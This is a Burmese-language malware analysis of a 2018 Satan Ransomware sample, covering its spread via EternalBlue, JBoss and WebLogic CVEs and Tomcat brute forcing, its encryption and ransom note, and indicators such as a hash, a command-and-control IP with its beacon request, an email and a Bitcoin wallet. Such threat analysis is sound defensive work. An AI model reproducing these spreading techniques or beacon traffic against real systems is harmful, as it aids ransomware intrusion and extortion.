Satan Ransomware ကို Bleeping Computer Website မှ ဇန်နဝါရီလ ၂၀၁၇တွင် ပထမဆုံး ထုတ်ဖော် တင်ပြခဲ့ပါသည်။ မကြာသေးမီက Satan Ransomware သည် EternalBlue exploit ကို အသုံးပြုကာ ပျံ့နှံ့စေခဲ့ သည်ဟု သတ်မှတ်ခြင်းခံရပါသည်။ ၎င်း exploit သည် WannaCry Ransomware တွင် အသုံးပြုခဲ့သော exploit ပင်ဖြစ်သည်။ Microsoft မှ မတ်လ ၂၀၁၇ တွင် EternalBlue နှင့် ဆက်စပ်နေသော အားနည်းချက်များကို ပြန်လည်ဖာထေးခဲ့သော်လည်း patch မလုပ်ရသေးသော ကွန်ပျူတာများ ကျန်ရှိနေဆဲပင်ဖြစ်သည်။ Satan Ransomware မှ EternalBlue ကို အသုံးပြုရုံသာမက တစ်ခြားပျံ့နှံ့စေသည့် နည်းလမ်းများကိုလည်း အသုံးပြု ထားသည်ဟု သတ်မှတ်ခြင်းခံရသည်။
Satan Ransomware သည်−
- JBoss CVE-2017-12149
- Weblogic CVE-2017-10271
- EternalBlue exploit CVE-2017-0143
- Tomcat web application brute forcing စသည့် vulnerability များကို အသုံးပြုကာ ပျံ့နှံ့စေခြင်း ဖြစ်သည်။
Malware Analysis
အောက်တွင် ဖော်ပြထားသော sample သည် Satan Ransomware မှ ၂၀၁၈ မေလအစောပိုင်းတွင် အထက်ဖော်ပြပါ နည်းလမ်းများကို အသုံးပြု၍ ပျံ့နှံ့စေခြင်းကို analyze ပြုလုပ်ထားခြင်းပင်ဖြစ်သည်။
Name: sts.exe
File size: 1.7 Mb
MD5: c290cd24892905fbcf3cb39929de19a5
Analyzed ပြုလုပ်မည့် sample တွင် ပထမဆုံးမြင်ရသည့် အရာသည် ၎င်း malware ကို MPRESS packer ဖြင့် pack လုပ်ထားခြင်းကို တွေ့မြင်ရမည်ဖြစ်သည်။
၎င်း sample ၏ အဓိကရည်ရွယ်ချက်သည် Satan Ransomware ကို drop လုပ်စေပြီး ပစ်မှတ်ကွန်ပျူတာကို encrypt ပြုလုပ်စေကာ Bitcoin payment ကို တောင်းဆိုခြင်းဖြစ်သည်။ ထို့နောက် ၎င်းsampleသည် EternalBlue ကဲ့သို့သော exploits များကို အသုံးပြုကာ network အတွင်း ပျံ့နှံ့စေခြင်းဖြစ်သည်။
EternalBlue
Satan malware သည် များစွာသော EternalBlue files များကို ပစ်မှတ်ကွန်ပျူတာဆီသို့ drop ပြုလုပ်ပါသည်။ ၎င်းfile များသည် မည်သည့်ပြုပြင်ပြောင်းလဲမှုများ ပြုလုပ်မထားသော EternalBlue exploits ၏ public version များပင် ဖြစ် သည်။ ထို file အားလုံးကို ကူးစက်ခံထားရသော system အတွင်းရှိ C:\Users\All Users\ directory အောက်တွင် drop လုပ်မည်ဖြစ်သည်။
sts.exe file သည် တူညီသော network segment အတွင်းရှိ system များအားလုံးကို scanning ဖတ်ခြင်းအားဖြင့် network တစ်လျှောက် ပျံ့နှံ့စေခြင်းကို စတင်သည်။ အောက်တွင် ပြသထားသော command line ကို အသုံးပြုခြင်းအားဖြင့် SMB EternalBlue exploits ကိုအားနည်းချက်ရှိသည့် system များသည် dropped လုပ်ထားပြီးသော library file ဖြစ်သည့် down64.dll ကို execute ပြုလုပ်မည်ဖြစ်သည်။
down64.dll file သည် ပစ်မှတ်ကွန်ပျူတာ၏memory တွင် code များကို load ပြုလုပ်နိုင်ရန် ကြိုးပမ်းသည်။ ထို့နောက် Microsoft ၏ တရားဝင် certutil.exe tool ကို အသုံးပြုကာ sts.exe ကို download ပြုလုပ်စေသည်။
၎င်း sample သည် တစ်ခြားnetwork များ၏activity ကိုအသုံးပြုကာ network တစ်လျှောက် ပျံ့နှံ့ခြင်းကို ဆက်လက်ဖြစ်ပွားစေသည်။ Compromised ပြုလုပ်ခြင်းခံထားရသော system သည် Clist1.jsp ဆီသို့ HTTP PUT request ကို ပြုလုပ်စေကာ jsp file မှ ပစ်မှတ်ထားသော server ဆီတွင် sts.exe file ကို download ပြုလုပ်နိုင်စေသည်။
အခြား system များကို ကူးစက်စေရန် အသုံးပြုသည့် အခြားစိတ်ဝင်စားဖွယ်ကောင်းသော နည်းပညာသည် Apache Tomcat server ကို bruteforce ပြုလုပ်ခြင်းပင်ဖြစ်သည်။ /manager/html file ဆီသို့ HTTP GET request ကိုပြုလုပ်ပြီး ၎င်း၏ response သည် “401 not authorized,” ဖြစ်ပါက အသုံးများသော usernames နှင့် passwords စာရင်းကို အသုံးပြုကာ ၎င်း file ဆီသို့ bruteforce access ကို စတင်ခြင်းပင်ဖြစ်သည်။
Encryption
Same network အတွင်းရှိ အခြား system များကို ကူးစက်စေပြီးနောက် ၊ နောက်ဆုံးတွင် Satan Ransomware ကို C:\Satan.exe file အဖြစ် drop လုပ်စေသည်။ ၎င်းexecutable file ကို မူလ sample အတိုင်း MPRESS ဖြင့် pack လုပ်ထားခြင်းဖြစ်သည်။
Satan.exe ကို execute ပြုလုပ်စေကာ ransomware attack ကို စတင်ပြီး အောက်တွင်ပြသထားသည့်အတိုင်း process များကို ရပ်တန့်သွားစေသည်။
Satan.exe file သည် “C:\Windows\Temp\KSession” directory အောက်တွင် KSession ဟူသော file ကို ဖန်တီးကာ ၎င်းထဲတွင် host identifier ကိုသိမ်းဆည်းထားစေသည်။
Encrypted ပြုလုပ်ထားပြီးသော files များကို satan_pro@mail.ru ဖြင့် <original_filename>.satan format အဖြစ် rename ပြုလုပ်သည်။ ထို့နောက် KSession file တွင် သိမ်းဆည်းထားသော parameter value များကို အသုံးပြုကာ GET requests ကို ပြုလုပ်ခြင်းဖြင့် Command နှင့် Control server ဆီသို့ data များ ပေးပို့စေသည်။
GET /data/token.php?status=ST&code=XXXXXXXXXXXXXXXXXXXXXXXXX HTTP/1.1 Connection: Keep-Alive
User-Agent: Winnet Client
Host: 45.124.132.119
Encrypted ပြုလုပ်ပြီးနောက် Satan.exe file သည် C:\_How_to_decrypt_files.txt directory အတွင်းသို့ instructions ရေးသားပြီး file ကို ဖန်တီးကာ notepad ဖြင့်note ကိုဖွင့်စေပါသည်။
ထို note တွင် system ကို decrypt ပြုလုပ်ရန် instructions များပါဝင်ပြီး satan_pro@mail[.]ru ဟူသော ဆက်သွယ်ရန် email address ပါဝင်ပြီး Bitcoinကို တောင်းခံပါသည်။
အထက်ဖော်ပြပါ Bitcoin wallet ကို ခြေရာခံသောအခါ−
14hCK6iRXwRkmBFRKG8kiSpCSpKmqtH2qo ဟူသော Bitcoin wallet သည် ယခုလက်ရှိတွင် အနည်းငယ်သော payment ကိုသာ လက်ခံရရှိပါသေးသည်။ နောက်ဆုံး payment မှာ မေလ ၂၀၁၈ တွင် ဖြစ်ပြီး ၎င်း၏balance မှာ 0.5 BTC ဖြစ်ပြီး ယခုရေးသားနေချိန်တွင် ခန့်မှန်းခြေ $3600 တန်ကြေးရှိသည်။
နိဂုံး
Ransomware ဆက်လက်ရှင်သန်နေခြင်းနှင့် အောင်အောင်မြင်မြင် ဆက်လက်ပြန့်ပွားနိုင်စေရန် အမျိုးမျိုးသော exploit များနှင့်နည်းလမ်းများ ပါဝင်လာနိုင်စေအောင် မွမ်းမံပြင်ဆင်နေခြင်းသည် စိုးရိမ်ဖွယ်ရာကောင်းသော အလားအလာရှိ ပါကြောင်း ရေးသားဖော်ပြအပ်ပါသည်။